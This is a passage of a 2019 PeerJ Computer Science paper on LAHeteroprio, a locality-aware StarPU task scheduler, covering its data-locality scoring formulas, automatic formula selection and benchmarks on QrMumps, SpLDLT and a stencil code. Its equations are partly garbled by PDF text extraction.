(LS_SDH) with the score given by LS SDHðm; tÞ ¼ X d2Dt;m d:size: (6) The core idea of LS_SDH is to consider that the memory node that already hosts the largest amount of data (in volume) needed by t is the one where t has to be executed. If all the tasks use different/independent pieces of data and each of them is used once, then we except that both MC_StarPU and LS_SDH(m,t) return meaningful scores. However, there are other aspects to consider. For example, if there is a piece of data duplicated on every node it should be ignored. Moreover, we can also consider that a piece of data used in read is less critical than the ones used in write for multiple reasons. A piece of data used in read might be used by several tasks (in read) at the same time, and thus the transfer cost only impacts the first task to be executed on the memory node. In addition, a piece of data in write is expected to be used in read later on, which means that moving a piece of data that will be accessed in write on a memory node, partially guarantees that this data will be re-used soon. Finally, writing on a set of data invalidates all copies on other memory nodes. Thus, we define three different formulas based on these principles, where we attribute more weight to the write accesses to reduce the importance of the read accesses. The LS_SDH2 is the score given by summing the amount of data already on a node, but the difference with LS_SDH is that each data in write is counted in a quadratic manner LS SDH2ðm; tÞ ¼ X d2DREADt;m d:size 0 @ 1 A þ X d2DWRITEt;m d:size2 0 @ 1 A: (7) Alternatively, we propose the LS_SDHB score where we sum the amount of data on a node but we balance the data in write with a coefficient h. Moreover, we consider that for the same amount of data on two memory nodes, the one that has more pieces of data should be prioritized. In other words, transferring the same amount of data but with more items is considered more expensive. The formula is given by LS SDHBðm; tÞ ¼ X d2DREADt;m d:size 0 @ 1 A þ u � �ðDWRITEt;m Þ � X d2DWRITEt;m d:size 0 @ 1 A: (8) We set h = 1,000 for the rest of the study as it provides an important load to the data in write without canceling the cost of huge transfer for data in read. Finally, we propose the LC_SMWB cost formula LC SMWBðm; tÞ ¼ X d2DREADt;:m d:size 0 @ 1 A þ X d2DWRITEt;:m d:size � 2 � �ðt:data \ WRITEÞ �ðt:dataÞ 0 @ 1 A: (9) Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 9/24 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ In LC_SMWB, we sum the amount of data that is going to be moved, but we use an extra coefficient for the data in write. This coefficient takes the value 1 if all the data used by t are in write, but it gets closer to 2 as the number of data dependencies in read gets larger than the number of data dependencies in write. Examples of memory node selection Table 1 illustrates how the formulas behave and which memory nodes are selected for different configurations. This example shows that the formulas can select different memory nodes depending both on the number of data dependencies in read/write and their sizes. Automatic DLAF selection We propose several data locality affinity formulas (DLAF) but only one of them is used to find out the best memory node when a newly ready task is pushed into the scheduler. We describe here our mechanism to automatically select a DLAF during the execution by comparing their best memory node difference (BMD) values. A BMD value indicates the robustness of a DLAF by counting how many times it returns a different node id when a task is pushed or popped. More precisely, every time a task t is pushed, we call a DLAF to know which of the memory nodes is selected to execute the task, and we store this information inside the scheduler. Then, every time a task is popped, we call again the same DLAF to know which of the memory node seems the more appropriate to execute the task, and we compare this value with the one obtained at push time, as illustrated by Fig. 4. If both values are different, we increase the BMD counter. A low BMD value means that the DLAF is robust to the changes in the memory during the push/pop elapsed time. We consider that this robustness is a good metric to automatically select a DLAF, and thus we continually compared the BMD counters of all DLAF, and use the one that has the lowest value to select the list where to push the tasks. Iterating order on the lists of the grid (pop) In this section, we describe how the workers iterate over the task-lists of G. Table 1 Examples of memory node selection by the proposed DLAF for different tasks and data configurations. Tasks(Data/access mode/size, : : : ) MN0 hosts MN1 hosts MN2 hosts LS_DH winner LS_SDH2 winner LS_SDHB winner LC_SMWB winner T(A/R/1, B/W/1) A A B MN{0,1,2} MN{0,1,2} MN2 MN2 T(A/R/1, B/W/1) A A B B MN1 MN1 MN1 MN1 T(A/W/1, B/W/1, C/W/2) A B C A C MN2 MN2 MN2 MN2 T(A/W/1, B/W/1, C/W/1) A B A B A C MN{0,1,2} MN{0,1,2} MN{0,1,2} MN{0,1,2} T(A/R/2, B/R/1, C/W/2, D/W/2) A B A C C D MN2 MN2 MN2 MN2 T(A/W/10, B/W/11, C/W/18, D/W/11) A D C B D MN2 MN1 MN2 MN2 T(A/W/10, B/W/11, C/W/22, D/W/11) A D C B D MN{1,2} MN1 MN2 MN{1,2} Note: The memory nodes are labeled MN and in the case the scores assign the best values to more than one memory nodes, all of them are written inside brackets. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 10/24 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ Distance between memory nodes First, we build a distance matrix between the memory nodes. We defined the data transfer speed between memory nodes as an inverse of the distance; the distance is given by StarPU and it is the time that takes to move a piece of data from one memory node to another distancetransferði; jÞ ¼ normalizeðstarpu transfer predictðj; i; 10243ÞÞ: (10) However, it is important to remember that our scheduler is based on priorities and thus we also use a second metric to look at the difference in terms of priorities between the workers of different memory nodes. More precisely, we define a priority distance between workers of different memory nodes by distancepriorityði; jÞ ¼ 1 � PB k¼1 jPði; kÞ � Pðj; kÞj ðmaxðNPi; NPjÞ þ 1Þ � ðmaxðNPi; NPjÞ þ 2Þ=2 : (11) The numerator of the fraction provides a difference factor between i and j, whereas the denominator part ensures that the values stays between 0 and 1. The value 0 is obtained when two workers used the same priority indexes. They access the same buckets in the same order. In Table 2, we provide examples of the priority distance for two array indexes. Finally, we use both distance coefficients to find a balance between priorities and memory transfer capacities, and we obtain the final measure with distanceði; jÞ ¼ distancepriorityði; jÞ � a � � þ distancetransferði; jÞ � ð1 � aÞð Þ: (12) From Eq. (12), two memory nodes are close if they are well-connected and if their priorities (how their workers iterate on the buckets) are different. Prioritizing locality/priorities in the access orders Using the distance matrix between the memory nodes, two straightforward access orders can be considered. In the first one, we consider that data locality is more critical than the 4 b u ck e ts Figure 4 View of the best memory node difference (BMD), which is computed by counting the number of difference returned by the DLAF between the moment when a task is pushed or popped. Full-size DOI: 10.7717/peerj-cs.190/fig-4 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 11/24 http://dx.doi.org/10.7717/peerj-cs.190/fig-4 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ priority of the tasks; In this case, a worker iterates on all the lists related to its memory node following the priority order, and only if it cannot find a ready task it looks at the lists of the second closest memory node. The workers iterate over G(b,m) with an outer loop of indexes m and an inner loop of index b (column-by-column). In a second case, we chose priority over data locality; In this case, a worker iterates with an outer loop of indexes b and an inner loop of index m (row-by-row). One drawback of the locality-oriented access is that it pushes the priorities in the background, which means that a local task of low priority should always be done before a less local task of higher priority. On the other hand, the priority oriented access breaks the locality benefit because a worker looks at all the memory nodes’ task-lists one priority after the other. Hence, both approaches are balanced using subgroups in this study. Memory node subgroups We propose that each memory node sees the others as two separate groups. The idea is to maximize the exchanges with the first group of size S, and use the second group only to steal tasks to avoid being idle. To do so, we use a locality coefficient l that correspond to the number of consecutive buckets that are queried before going to the next memory node. The iterations on the grid G are done so that the worker looks at the l first buckets of its memory node, then at the l first buckets of its S closest memory nodes. This is done until all buckets of the worker’s memory node and the S subgroups have been scanned. Then, in a second stage, the other memory nodes, from S + 1 to M, are scanned bucket after bucket. Both S and l parameters can be different for each memory nodes. An example of this access order strategy can be seen in Table 3. With the settings given in the example, we use l = 2 for the CPU workers, see Table 3B. Consequently, the CPU workers look at two buckets of the CPU memory node lists, before looking at the GPU lists. PERFORMANCE STUDY Configuration The following software configuration was used: GNU compiler 6.2, CUDA Tookit 9.0, Intel MKL 2019 and StarPU1. We set the environment variables STARPU_CUDA_PIPELINE=4, STARPU_PREFETCH=1 and STARPU_DISABLE_PINNING=0. From Eq. (12), we defined a = 0.5, and as a result the closest memory node to any GPU was always the CPU. StarPU supports multi-streaming capability of modern GPUs by running multiple CPU threads to compute on the same GPU. This is controlled by STARPU_NWORKER_PER_CUDA Table 2 Priority distance examples between buckets/priorities indexes of i and j. Priorities for i Priorities for j distancepriority (i,j) 1 2 2 1 0 1-0.4 1 2 0 1 1-0.2 1 2 0 1 2 1-0 3 1 2 0 1 2 3 1-0.26 3 1 2 0 1 3 2 1-0.26 3 1 2 0 3 2 1 1-0.13 1 We created our scheduler on the master branch of the official repository https:// scm.gforge.inria.fr/anonscm/git/starpu/ starpu.git at commit id 22e8e132e0e6 c09c9a5d4539d46b3d59503749e7 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 12/24 https://scm.gforge.inria.fr/anonscm/git/starpu/starpu.git https://scm.gforge.inria.fr/anonscm/git/starpu/starpu.git https://scm.gforge.inria.fr/anonscm/git/starpu/starpu.git http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ and we used different values depending on the hardware and the application that was run. The set values were application specific. The automatic DLAF selection, described in the section “Automatic DLAF Selection,” was based on LS_SDH, LS_SDH2, LS_SDHB and LC_SMWB, but excluded LaRU and MC_StarPU. Hardware We used two different configurations and we refer to each of them using their corresponding GPU model. � P100 Is composed of 2 � Dodeca-core Haswell Intel Xeon E5-2683 v4 2,10 GHz, and 2 � P100 GPU (DP 4.7 TeraFLOPS). � K40 Is composed of 2 � Dodeca-core Haswell Intel Xeon E5-2680 v3 2,50 GHz and 4 � K40 GPU (DP 1.43 TeraFLOPS). Applications We studied three applications to assess our method. Two of them were linear algebra applications that already used StarPU and Heteroprio. Hence, no further development was Table 3 Access list examples for a configuration with one CPU and two GPUs (three memory nodes in total). (A) Distance matrix from Eq. (12). CPU GPU-0 GPU-1 CPU 0 0.5 1 GPU-0 0.5 0 1 GPU-1 0.5 1 0 (B) Access order for CPU workers. Priorities Buckets G(*,CPU) G(*,GPU-0) G(*,GPU-1) 3 G(3,*) 7 11 10 2 G(2,*) 6 9 8 1 G(1,*) 1 5 4 0 G(0,*) 0 3 2 (C) Access order for GPU-0 workers. Priorities Buckets G(*,CPU) G(*,GPU-0) G(*,GPU-1) G(1,*) 5 4 8 G(2,*) 3 1 7 G(3,*) 2 0 6 (D) Access order for GPU-1 workers. Priorities Buckets G(*,CPU) G(*,GPU-0) G(*,GPU-1) G(1,*) 5 8 4 G(2,*) 3 7 1 G(3,*) 2 6 0 Note: We use four buckets, but the tasks of bucket zero are only active on CPU. The priorities—the order of access to the buckets—is reversed for the GPU workers. S, the size of closed memory node subgroup, is set to two for the CPU and to one for the GPUs. Finally, the locality factor l is two for both. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 13/24 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ needed inside them since the interfaces of Heteroprio and LAHeteroprio are similar. The third one was a stencil application that we modified to be able to use Heteroprio/ LAHeteroprio. � QrMumps This application uses four different types of tasks and three of them can be run on the GPUs. We used STARPU_NWORKER_PER_CUDA=16 on P100, and STARPU_NWORKER_PER_CUDA=7 on K40. The test case was the factorization of the TF18 matrix2. � SpLDLT This application uses four different types of tasks and only one of them can run on the GPUs. Consequently, to select a task for a GPU, there is no choice in terms of bucket/priority but only in terms of memory node. We used STARPU_NWORKER_PER_ CUDA=18 on P100, and STARPU_NWORKER_PER_CUDA=11 on K40. The test case was the Cholesky factorization of a 20,000 � 20,000 matrix. � StarPU-Stencil This application is a stencil simulation of the game life, which is available as an example in the StarPU repository. It uses only one type of tasks that can run on CPU or GPU. Consequently, to select a task for any of the processing unit, there is no choice in terms of bucket/priority but only in terms of memory node. We used STARPU_NWORKER_PER_CUDA=3 on P100 and K40. The test case was a grid of dimension 1,0243 executed for 32 iterations. Metrics In our tests, we evaluated two different speedups. The first was the speedup-from-average (SFA), which represents the average execution times of Heteroprio based for six executions, divided by the average execution times of a target for six executions. The second was the speedup-from-minimum (SFM), which represents the lowest execution time of Heteroprio divided by the lowest execution time of a target, therefore, both were obtained from a single execution. The SFA provides information of the average performance that can be expected whereas the SFM provides information about the variability and gives us an idea of what could be achieved if the executions were always perfect. Evaluation of the locality coefficient for all DLAF We first evaluated the effect of the locality coefficient l, described in the section “Memory node subgroups,” on the execution time and summarized the results in Fig. 5. Then, we looked at the speedup of LAHeteroprio against Heteroprio for different l settings with three different comparisons. In the first one, we used all the average execution times obtained using LAHeteroprio without dissociating the different DLAF; in the second one we computed the speedup using only the best DLAF (with the lowest average), and in the third one we compared the unique best execution over all of both Heteroprio and LAHeteroprio. Focusing on QrMumps, it can be seen in Figs. 5A and 5B that the best performance was obtained when we prioritized the locality for the GPU with lGPU = 3. The locality coefficient for the CPU seems less critical and the speedup is more or less the same for all lCPU values. When the number of GPUs increases, the influence of l decreases, and we 2 The matrix had been taken from the SuiteSparse Matrix Collection at https://sparse.tamu.edu/ Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 14/24 https://sparse.tamu.edu/ http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ (a) QrMumps/K40 (b) QrMumps/P100 (c) SpLDLT/K40 (d) SpLDLT/P100 (e) StarPU-Stencil/K40 (f) StarPU-Stencil/P100 Figure 5 Speedup results of LAHeteroprio against Heteroprio for QrMumps (A, B), SpLDLT (C, D) and StarPU-Stencil (E, F) on K40 or P100 configurations. The x-axis is used of the different l pairs of the form (lCPU, lGPU). The gray bars (▪) represent SFA for all DLAF and gives an idea of the speedup of LAHeteroprio, here each configuration is executed six times. The light gray bars (▪) represent the SFM of the DLAF with the best speedup in average. The lines (- � -) represent the SFM using the best execution times among all DLAF, that is the speedup when we compare the best single execution using Heteroprio and LAHeteroprio. Full-size DOI: 10.7717/peerj-cs.190/fig-5 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 15/24 http://dx.doi.org/10.7717/peerj-cs.190/fig-5 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ had similar executions with two P100 GPUs or four K40 GPUs for all l values. However, the speedup against Heteroprio was still significant, which means that splitting the buckets into several lists is beneficial as soon as the workers pick first in the list that corresponds to their memory node for their highest priority bucket. Also, it seems that the way they iterate on the grid does not have any effect. The results for SpLDLT are provided in Figs. 5C and 5D. Here, the impact of l seems to be limited, but it is worth remembering that the GPU can only compute one type of task. On the other hand, the speedup obtained using all DLAF was unstable and significantly lower compared to the speedups obtained when we used only the best DLAF. This suggests that there are significant differences in performance among the different DLAF and also that some of them are certainly not efficient. The results that we provide in the next section corroborates this hypothesis. The results for StarPU-Stencil are provided in Figs. 5E and 5F. There is no choice in the value l because there is only one type of task. The speedup obtained using all DLAF was unstable and significantly lower compared to the speedups obtained when we used only the best DLAF, which again suggests that the different DLAF provide heterogeneous efficiency. Execution details Using the performance results of section “Evaluation of the Locality Coefficient for all DLAF,” we used a l = (1,3) for QrMumps, and a l = (3,1) for SpLDLT. We evaluated the performance of the different DLAF described in the section “Task Insertion in the Grid with Locality Evaluation (push),” looking for the speedup against Heteroprio, the amount of memory transfer, and the BMD, see Figs. 6–8. Speedup We provide the speedup obtained with our method against Heteroprio in Figs. 6A and 6B for QrMumps, Figs. 7A and 7B for SpLDLT, and Figs. 8A and 8B for StarPU-Stencil. For all configurations, the LaRU and MC_StarPU formulas did not significantly improve the execution, furthermore, they were slower than Heteroprio in some cases. For LaRU, this means that having one piece of data already on the memory node and neglecting the others is not efficient. Meanwhile, for MC_StarPU, it means that putting a task on the memory node for which it is the cheapest in terms of data transfer is not the best choice. This is not surprising, since this kind of decision would make sense if we have only one task to compute. However, we clearly see that in the present study, when we had to deal with a graph of tasks, where the data were used concurrently and could be re-used by other tasks, this was not accurate. Nevertheless, this result could also have been affected from inaccurate predictions made by StarPU. Comparing the different DLAF, it can be seen that both LS_SDH2 and LS_SDHB significantly improved the three applications. LC_SMWB was competitive for QrMumps and StarPU-Stencil but not for SpLDLT, and LS_SDH was competitive for StarPU-Stencil but not for QrMumps and it had poor performance for SpLDLT. The main difference between LS_SDH2/LS_SDHB and LC_SMWB/LS_SDH is that the second ones are not Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 16/24 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ (a) QrMumps/K40 - Speedup (b) QrMumps/P100 - Speedup (c) QrMumps/K40 - Memory transfer (d) QrMumps/P100 - Memory transfer (e) QrMumps/K40 - BMD (f) QrMumps/P100 - BMD Figure 6 Execution details for QrMumps on K40 or P100 configurations for a locality coefficient l = (3, 3). The speedup (A, B) includes SFA (▪) and SFM (- � -). The memory transfers (C, D) and BMD (E, F) are average values. Full-size DOI: 10.7717/peerj-cs.190/fig-6 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 17/24 http://dx.doi.org/10.7717/peerj-cs.190/fig-6 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ (a) SpLDLT/K40 - Speedup (b) SpLDLT/P100 - Speedup (c) SpLDLT/K40 - Memory transfer (d) SpLDLT/P100 - Memory transfer (e) SpLDLT/K40 - BMD (f) SpLDLT/P100 - BMD Figure 7 Execution details for SpLDLT on K40 or P100 configurations for a locality coefficient l = (2, 1). The speedup (A, B) includes SFA (▪) and SFM (- � -). The memory transfers (C, D) and BMD (E, F) are average values. Full-size DOI: 10.7717/peerj-cs.190/fig-7 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 18/24 http://dx.doi.org/10.7717/peerj-cs.190/fig-7 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ (a) StarPU-Stencil/K40 - Speedup (b) StarPU-Stencil/P100 - Speedup (c) StarPU-Stencil/K40 - Memory transfer (d) StarPU-Stencil/P100 - Mem- ory transfer (e) StarPU-Stencil/K40 - BMD (f) StarPU-Stencil/P100 - BMD Figure 8 Execution details for StarPU-Stencil on K40 or P100 configurations for a locality coefficient l = (2, 1). The speedup (A, B) includes SFA (▪) and SFM (- � -). The memory transfers (C, D) and BMD (E, F) are average values. Full-size DOI: 10.7717/peerj-cs.190/fig-8 Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 19/24 http://dx.doi.org/10.7717/peerj-cs.190/fig-8 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ giving an important load to the pieces of data used in write, and LS_SDH does not even make a distinction between read and write. It seems that taking into account write is important for QrMumps and SpLDLT but not for StarPU-stencil. On the two linear algebra applications, the tasks transform the blocks of the matrix, and many of the blocks are written several times before being read multiple times. On the contrary in StarPU-stencil, each block is written once per iteration and read only to compute the close neighbors. While the results from the different DLAF are diverse, our automatic formula selection, described in the section “Automatic DLAF selection,” was efficient and always close to the best execution. Consequently, there is no need to try the different DLAF as the automatic selection is reliable. Transfer The total amount of memory transfer obtained with our method and Heteroprio are provided in Figs. 6C and 6D for QrMumps, Figs. 7C and 7D for SpLDLT, and Figs. 8C and 8D for StarPU-Stencil. For QrMumps, all approaches used in this study reduced the total memory transfer. However, a decrease of the memory transfer does not necessary mean having better performance. For example, for the K40 configuration, and with either one or two GPUs, MC_StarPU drastically reduced the amount of data transfer compared to Heteroprio, see Fig. 6C, but it had a negative speedup, see Fig. 6A. It means that, even if in all LAHeteroprio-based executions the workers iterated similarly on G, the placement of the tasks on the grid can be quite efficient in terms of transfer, but it penalized the whole execution. In the case of SpLDLT, the memory transfer did not decrease compared to Heteroprio when MC_StarPU, LaRU, or LS_SDH were used. This further supports our idea that the data in write should count more than the data in read. Moreover, LC_SMWB balances the data in write but only with a factor 2 at most; even if it reduced the memory transfer compared to Heteroprio, the reduction was not as large compared with LS_SDH2/LS_SDHB. Finally, when we used SpLDLT the amount of memory transfer and the execution time were reduced. Looking at the results of StarPU-Stencil, the memory transfer reduction was not as strong as for QrMumps. In addition, there is a correlation between the transfer reduction and the resulting speedup, such that the lowest amount of transfer were obtained with LS_SDH, LS_SMWB and LS_SDHB for most of the configurations. Again, the automatic mode is efficient and even when one of the DLAF is not competitive, for instance LC_SMWB in the case of QrMumps/SpLDLT or LC_SDH2 for StarPU-Stencil, the automatic system is robust enough to make correct decisions and remains competitive. BMD We provide the BMD values for the different DLAF in Figs. 6E and 6F for QrMumps, Figs. 7E and 7F for SpLDLT, and Figs. 8E and 8F for StarPU-Stencil. For QrMumps, the BMD values were low for all formulas except LS_SDH and LaRU. These measures proof that LS_SDH is sensitive to the data changes that happen in the Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 20/24 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ time that takes a pushed task to be popped. Furthermore, this is due to its formula as it considers the data in read or write to be the same. On the other hand, MC_StarPU was stable with a small BMD value. However, this is surprising, because the high value for LS_SDH illustrates the volatility of the data, and thus MC_StarPU should also be sensitive to the changes that happened between push/pop. For SpLDLT and StarPU-Stencil, we observed a clear relation between the BMD values and the speedup. The formulas that did not provide a speedup are the ones with the highest BMD values. This validates the construction of our automatic method that uses the DLAF with the lowest BDM. In the three applications, the LaRU has a special meaning when looking at the BMD value. When a task is pushed, LaRU returns the id of the memory node of the worker that push the task and similarly, when a task is popped, LaRU returns the id of the memory node of the worker that pop the task. Therefore, the LaRU’s BDM value is the percentage of tasks that are pushed and popped by worker related to different memory nodes. Therefore, we see that in QrMumps up to 30% of the tasks were stolen but this number grow up to 50% for StarPU-Stencil and 80% for SpLDLT. Summary of the evaluation The speedup obtained with LAHeteroprio was really significant. In most cases, there was a proportional relation between memory transfer and execution time, which means that reducing memory transfer caused a reduction in the time needed to execute the task. The BMD metric is valuable to evaluate the robustness of DLAF and it can be used to predict its performance. Moreover, our automatic DLAF selection based on BMD was highly competitive with a speedup close to the best-achieved executions. Finally, LAHeteroprio reduced the amount of memory transfer with any number of GPUs for the three applications. CONCLUSION We have improved our Heteroprio scheduler with a new mechanism that considers data locality. The new system divides the task buckets into as many lists as there are memory nodes. We have created different formulas to evaluate the locality of a task regarding a memory node, and we found that formulas that omit many parameters (as the use of the StarPU prediction functions) provide a low performance; this is probably due to the neglect of the type of accesses of the tasks on the data. Nevertheless, we have shown that locality evaluation is more sensitive to write accesses and this has been validated with the results of the BMD metric. Concerning the pop strategy, it is necessary to set the locality coefficient to the largest value for the GPUs, to ensure that workers focus on locality before priorities. It is possible to use our new scheduler, without introducing additional information or modification, using our automatic DLAF selection system, which is close to the best executions in most cases. Finally, our new scheduler improves the performance of QrMumps, SpLDLT and StarPU-Stencil by 30%, 80% and 30%, respectively. It also reduces the data transfer more than 50%. In terms of perspective, the scheduler could still be improved on different aspects. It could be beneficial to change the distance between the memory nodes at runtime, Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 21/24 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ which means changing the victims of the work stealing and even having workers of the same memory node that steal the tasks on other memory nodes. In addition, the original priorities of the scheduler are set per architecture, and the new locality heuristic is set per memory node, but a finer approach could be interesting even if it has a challenging tuning and setup. For example, we could have one worker per GPU that uses a different access order over the buckets with the objective of avoiding some transfers. Finally, we would like to study LAHeteroprio on other kinds of applications with more diverse types of tasks, and on different type of hardware configurations. ACKNOWLEDGEMENTS The experiments presented in this paper were carried out using the PlaFRIM experimental testbed, supported by Inria, CNRS (LABRI and IMB), Université de Bordeaux, Bordeaux INP and Conseil Régional d’Aquitaine (see https://www.plafrim.fr/). We would like to thank Alfredo Buttari for his support on QrMumps, and Florent Lopez for his support on SpLDLT. ADDITIONAL INFORMATION AND DECLARATIONS Funding There was no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Bérenger Bramas conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: The Supplemental Files include the source code of the scheduler and the details of the executions of QrMumps and SpLDLT in two raw data/CSV files. These results were used to generate the figures for the article but they also contain additional information not presented in the article. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.190#supplemental-information. REFERENCES Agullo E, Aumage O, Bramas B, Coulaud O, Pitoiset S. 2017. Bridging the gap between OpenMP and task-based runtime systems for the fast multipole method. IEEE Transactions on Parallel and Distributed Systems 28(10):2794–2807 DOI 10.1109/tpds.2017.2697857. Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 22/24 https://www.plafrim.fr/ http://dx.doi.org/10.7717/peerj-cs.190#supplemental-information http://dx.doi.org/10.7717/peerj-cs.190#supplemental-information http://dx.doi.org/10.7717/peerj-cs.190#supplemental-information http://dx.doi.org/10.1109/tpds.2017.2697857 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ Agullo E, Beaumont O, Eyraud-Dubois L, Kumar S. 2016a. Are static schedules so bad? a case study on cholesky factorization. In: 2016 IEEE International Parallel and Distributed Processing Symposium (IPDPS). Piscataway: IEEE, 1021–1030 DOI 10.1109/IPDPS.2016.90. Agullo E, Bramas B, Coulaud O, Darve E, Messner M, Takahashi T. 2016b. Task-based FMM for heterogeneous architectures. Concurrency and Computation: Practice and Experience 28(9):2608–2629 DOI 10.1002/cpe.3723. Agullo E, Buttari A, Guermouche A, Lopez F. 2015. Task-based multifrontal qr solver for gpu-accelerated multicore architectures. In: 2015 IEEE 22nd International Conference on High Performance Computing (HiPC). Washington, D.C.: IEEE Computer Society, 54–63 DOI 10.1109/HiPC.2015.27. Akbudak K, Ltaief H, Mikhalev A, Charara A, Keyes DE. 2018. Exploiting data sparsity for large-scale matrix computations. In: Euro-Par 2018: Parallel Processing. Euro-Par 2018. New York: Springer. Al-Omairy R, Miranda G, Ltaief H, Rosa B, Martorell X, Labarta J, Keyes D. 2015. Dense matrix computations on numa architectures with distance-aware work stealing. Supercomputing Frontiers and Innovations 2(1):49–72 DOI 10.14529/jsfi150103. Augonnet C, Thibault S, Namyst R, Wacrenier P-A. 2011. StarPU: a unified platform for task scheduling on heterogeneous multicore architectures. Concurrency and Computation: Practice and Experience 23(2):187–198 DOI 10.1002/cpe.1631. Baptiste P, Pape CL, Nuijten W. 2001. Constraint-based scheduling. Norwell: Kluwer Academic Publishers. Bauer M, Treichler S, Slaughter E, Aiken A. 2012. Legion: Expressing locality and independence with logical regions. In: International Conference on High Performance Computing, Networking, Storage and Analysis. Washington, D.C.: IEEE Computer Society Press, 66. Beaumont O, Cojean T, Eyraud-Dubois L, Guermouche A, Kumar S. 2016. Scheduling of linear algebra kernels on multiple heterogeneous resources. In: 2016 IEEE 23rd International Conference on High Performance Computing (HiPC). Piscataway: IEEE, 321–330 DOI 10.1109/HiPC.2016.045. Beaumont O, Eyraud-Dubois L, Kumar S. 2017. Approximation proofs of a fast and efficient list scheduling algorithm for task-based runtime systems on multicores and gpus. In: 2017 IEEE International Parallel and Distributed Processing Symposium (IPDPS). Piscataway: IEEE, 768–777 DOI 10.1109/IPDPS.2017.71. Beaumont O, Eyraud-Dubois L, Kumar S. 2018. Fast approximation algorithms for task-based runtime systems. Concurrency and Computation: Practice and Experience 30(17):e4502 DOI 10.1002/cpe.4502. Bramas B. 2016. Optimization and parallelization of the boundary element method for the wave equation in time domain. PhD thesis. Bordeaux University. The�se de doctorat dirigée par Coulaud, Olivier Informatique Bordeaux 2016. Carpaye JMC, Roman J, Brenner P. 2018. Design and analysis of a task-based parallelization over a runtime system of an explicit finite-volume cfd code with adaptive time stepping. Journal of Computational Science 28:439–454 DOI 10.1016/j.jocs.2017.03.008. Danalis A, Bosilca G, Bouteiller A, Herault T, Dongarra J. 2014. PTG: An abstraction for unhindered parallelism. In: Proceedings of the Fourth International Workshop on Domain- Specific Languages and High-Level Frameworks for High Performance Computing, (WOLFHPC), IEEE. Washington, D.C.: IEEE Computer Society, 21–30. Gautier T, Lima JV, Maillard N, Raffin B. 2013. XKaapi: A runtime system for data-flow task programming on heterogeneous architectures. In: Parallel & Distributed Processing (IPDPS), Bramas (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.190 23/24 http://dx.doi.org/10.1109/IPDPS.2016.90 http://dx.doi.org/10.1002/cpe.3723 http://dx.doi.org/10.1109/HiPC.2015.27 http://dx.doi.org/10.14529/jsfi150103 http://dx.doi.org/10.1002/cpe.1631 http://dx.doi.org/10.1109/HiPC.2016.045 http://dx.doi.org/10.1109/IPDPS.2017.71 http://dx.doi.org/10.1002/cpe.4502 http://dx.doi.org/10.1016/j.jocs.2017.03.008 http://dx.doi.org/10.7717/peerj-cs.190 https://peerj.com/computer-science/ 2013 IEEE 27th International Symposium on. Piscataway: IEEE, 1299–1308 DOI 10.1109/IPDPS.2013.66. He K, Meng X, Pan Z, Yuan L, Zhou P. 2019. A novel task-duplication based clustering algorithm for heterogeneous computing environments. IEEE Transactions on Parallel and Distributed Systems 30(1):2–14 DOI 10.1109/tpds.2018.2851221. Kale LV, Krishnan S. 1993. CHARM++: A portable concurrent object oriented system based on C++. In: ACM Sigplan Notices. Vol. 28. New York: ACM, 91–108 DOI 10.1145/165854.165874. Lopez F, Duff IS. 2018. Task-based sparse direct solver for symmetric indefinite systems. PMAA, TASK-BASED PROGRAMMING FOR SCIENTIFIC COMPUTING MS, Zurich, Switzerland. Moustafa S, Kirschenmann W, Dupros F, Aochi H. 2018. Task-based programming on emerging parallel architectures for finite-differences seismic numerical kernel. In: 24th International Conference on Parallel and Distributed Computing (Euro-Par 2018), Euro-Par 2018: Parallel Processing. New York: Springer DOI 10.1007/978-3-319-96983-1_54. Perez JM, Badia RM, Labarta J. 2008. A dependency-aware task-based programming environment for multi-core architectures. In: Cluster Computing, 2008 IEEE International Conference on. Piscataway: IEEE, 142–151 DOI 10.1109/CLUSTR.2008.4663765. Peter Brucker SK. 2009. Complexity results for scheduling problems. Available at http://www2.informatik.uni-osnabrueck.de/knust/class/ (accessed 7 December 2018). Shetti KR, Fahmy SA, Bretschneider T. 2013. Optimization of the heft algorithm for a cpu-gpu environment. In: 2013 International Conference on Parallel and Distributed Computing, Applications and Technologies. Piscataway: IEEE, 212–218 DOI 10.1109/PDCAT.2013.40. Sukkari D, Ltaief H, Faverge M, Keyes D. 2018. Asynchronous task-based polar decomposition on single node manycore architectures. IEEE Transactions on Parallel and 